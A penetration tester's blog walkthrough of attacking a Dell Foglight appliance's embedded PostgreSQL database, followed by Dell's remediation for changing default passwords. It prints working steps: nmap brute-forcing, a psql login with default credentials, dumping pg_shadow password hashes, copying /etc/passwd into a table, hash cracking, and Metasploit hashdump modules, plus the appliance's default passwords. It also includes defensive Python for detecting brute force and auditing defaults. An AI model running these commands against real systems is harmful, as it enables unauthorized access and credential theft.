Attacking Dell Foglight Server

I was just talking to someone a little while ago about how rarely I run into Postgres on pentests. I have, however, run into a Postgres-based product called Foglight. OK, so what is a Dell Foglight box? A while back I was on a pentest and ran into one of these.

Let’s see… “Dell's application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending TransactionDNA technology.”

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

Here is a quick walk-through of me attacking Dell Foglight using Nmap NSE, some Postgres syntax, Metasploit, and a free rainbow table website called CrackStation.net. It also covers the proper remediation for the attack. Yes, I basically sanitized a pentest compromise notification document and turned it into a blog post, but c’mon, it’s been a really busy week and this is still good stuff.

Let’s get started…

My Attack Virtual Machine

Here is the virtual machine that I used for this:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

Nmap Syntax

Here we use Nmap to show possible ways an attacker would identify a host running Postgres.

First we scan TCP port 5432 on the system to verify that the host is running PostgreSQL:

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX

image 0001

Next we execute the NSE script “pgsql-brute” against the system:

sudo nmap -sV -p 5432 --script pgsql-brute XXX.XXX.XXX.XXX

image 0002

Nmap Attack Syntax Reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html
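As a defensive counterpart to the pgsql-brute step, here is an added example (my own code for this write-up, not from the original post or from Nmap). It runs over a few constructed PostgreSQL server log lines, assumes a log_line_prefix of '%m [%p] %h ' so the remote host appears on each line, and flags any host that fails password authentication against several role names within a short window, noting whether a login from that host succeeded afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample lines (not from the post). They assume a PostgreSQL
# log_line_prefix of '%m [%p] %h ' so the remote host appears on every line.
SAMPLE_LOG = """\
2015-03-02 14:05:01.101 UTC [4021] 10.0.0.50 FATAL:  password authentication failed for user "postgres"
2015-03-02 14:05:01.140 UTC [4022] 10.0.0.50 FATAL:  password authentication failed for user "admin"
2015-03-02 14:05:01.190 UTC [4023] 10.0.0.50 FATAL:  password authentication failed for user "vkernel"
2015-03-02 14:05:01.233 UTC [4024] 10.0.0.50 FATAL:  password authentication failed for user "root"
2015-03-02 14:05:01.280 UTC [4025] 10.0.0.50 FATAL:  password authentication failed for user "test"
2015-03-02 14:05:03.500 UTC [4027] 10.0.0.50 LOG:  connection authorized: user=postgres database=postgres
2015-03-02 15:10:00.000 UTC [4100] 10.0.0.7 FATAL:  password authentication failed for user "vkernel"
"""
LINE_RE = re.compile(r'^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \w+ \[\d+\] (\S+) '
                     r'(?:FATAL:  password authentication failed for user "([^"]+)"'
                     r'|LOG:  connection authorized: user=(\S+))')

def parse_events(log_text):
    """Yield (timestamp, host, outcome, role) for authentication failures and successes."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # other messages and DETAIL continuation lines are ignored
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        outcome = "fail" if m.group(3) else "ok"
        yield ts, m.group(2), outcome, m.group(3) or m.group(4)

def find_bruteforce(log_text, window=timedelta(seconds=60), min_failures=5):
    """Return {host: details} for hosts with >= min_failures failed logins inside `window`."""
    by_host = defaultdict(list)
    for ev in parse_events(log_text):
        by_host[ev[1]].append(ev)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[2] == "fail"]
        start, burst = 0, False
        for end in range(len(fails)):  # sliding window over failure timestamps
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= min_failures:
                burst = True
                break
        if not burst:
            continue
        later_ok = [e for e in evs if e[2] == "ok" and e[0] >= fails[0][0]]
        alerts[host] = {"failures": len(fails), "users": sorted({e[3] for e in fails}),
                        "success_after": later_ok[0][3] if later_ok else None}
    return alerts
```

A single failure from a second host is deliberately left unflagged; the signal is the burst of distinct role names from one source, followed by a successful login.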

 

 

PSQL Attack Syntax

Here we use the command-line Postgres client 'psql' to connect to the database:

psql -h XXX.XXX.XXX.XXX -U postgres -W postgres

image 0003

Next we list all the databases on the postgres system:

\l

image 0004

Next we list the usernames and MD5-hashed passwords (for the database, not the system):

select usename, passwd from pg_shadow;

image 0005

Next we show which database we are currently connected to:

select current_database();

image 0006

Next we create a temporary table called “secureninja” to store any data that we later might want to examine:

create table secureninja (input TEXT);

image 0007

Next we copy the /etc/passwd file into the secureninja table that we just created:

copy secureninja from '/etc/passwd';

image 0008

Next we display the /etc/passwd data that we copied into the secureninja table:

select input from secureninja;

image 0009

Next we delete the temporary table from the customer database:

drop table secureninja;

image 0010

Next we exit the postgres database:

\q

image 0011

Using a website like https://crackstation.net/ we can check the hashes for each database user (vkernel, root, postgres):

https://crackstation.net/

image 0012

image 0013

image 0014

image 0015
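The pg_shadow query earlier and the CrackStation lookup here both depend on one detail of PostgreSQL's legacy md5 scheme: the stored value is 'md5' followed by md5(password || role name), so the role name acts as a salt. The added example below (my own code, not from the post) uses that to audit constructed pg_shadow rows against an assumed list of candidate default passwords, which is the defender's version of the same check, and it skips roles whose hash uses another scheme such as SCRAM-SHA-256.

```python
import hashlib

def pg_md5(password, role):
    """Legacy PostgreSQL md5 scheme: 'md5' + hex(md5(password || role name)).
    The role name acts as the salt, so the same password hashes differently
    for 'postgres' and 'vkernel', and a plain md5(password) never matches."""
    return "md5" + hashlib.md5((password + role).encode("utf-8")).hexdigest()

def audit_default_passwords(shadow_rows, candidates):
    """shadow_rows: (usename, passwd) pairs as returned by the pg_shadow query.
    Returns (matches, skipped): matches maps role -> the candidate password
    that reproduces its stored hash; skipped lists roles whose passwd is empty
    or uses another scheme (e.g. SCRAM-SHA-256) and so was not compared."""
    matches, skipped = {}, []
    for role, stored in shadow_rows:
        if not stored or not stored.startswith("md5"):
            skipped.append(role)
            continue
        for pw in candidates:
            if pg_md5(pw, role) == stored:
                matches[role] = pw
                break
    return matches, skipped

# Constructed sample rows (not real appliance output). They are built with
# pg_md5 so the example is self-contained; the third row imitates a role that
# has already been moved to SCRAM, which this audit deliberately leaves alone.
CONSTRUCTED_ROWS = [
    ("postgres", pg_md5("postgres", "postgres")),
    ("vkernel", pg_md5("Ch4nged-By-Admin", "vkernel")),
    ("root", "SCRAM-SHA-256$4096:constructedsalt$constructedkey:constructedsig"),
]
# Assumed candidate list: the defaults this post names for the appliance, plus
# the obvious role-name-as-password case.
DEFAULT_CANDIDATES = ["postgres", "vkernel", "password"]

if __name__ == "__main__":
    found, not_checked = audit_default_passwords(CONSTRUCTED_ROWS, DEFAULT_CANDIDATES)
    for role, pw in found.items():
        print(f"role {role!r} still uses default password {pw!r}")
    for role in not_checked:
        print(f"role {role!r} not checked (no md5 hash)")
```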

 

Here we start to use a common hacker tool called Metasploit to attack the database:

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

image 0016

Here you can see that the Metasploit Framework has loaded to its main page:

image 0017

Here we use Metasploit to actually dump the postgres database hashes:

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

image 0018

Next we use Metasploit to dump the postgres database schema:

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

image 0019

Here you can see that Metasploit successfully dumped the postgres database schema:

image 0020

Alright...now on to how to fix this. Before we cover how to fix it - quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Remediation

Dell provides documentation on how to fix this vulnerability.

How to change the default passwords for the embedded PostgreSQL database.

Description

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and postgres.

Resolution

Log into the console of the virtual appliance, either directly in vSphere Client/Hyper-V Manager or by establishing an ssh connection using a suitable application.

  • Log in using userid vkernel (default password vkernel)

  • Then become the root user using the command su - (default password password)

  • Issue the command /usr/local/vkernel/scripts/externalDbAccess.sh then press ENTER

  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 - Enable the embedded database access from the outside world
2 - Disable the embedded database access from the outside world
3 - Set the database users' passwords
Please select one of the above:3
Stopping VKernel collector...
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
VKernel collector has been stopped
done
Stopping VKernel monitor...
VKernel monitor has been stopped
done
Stopping tomcat...
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database...
Unregistering the appliance from previous database is done
Migrating Hyper-V collector...
Migrating Hyper-V collector is done
Updating database multi-appliances registry...
Updating database multi-appliances registry is done
Updating VKernel configuration...
Updating VKernel configuration is done

Configuration completed
applying password for user postgres
applying password for user vkernel
Starting tomcat...
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor...
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel monitor has been started
done
Starting VKernel collector...
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

 

 

Remediation Reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015
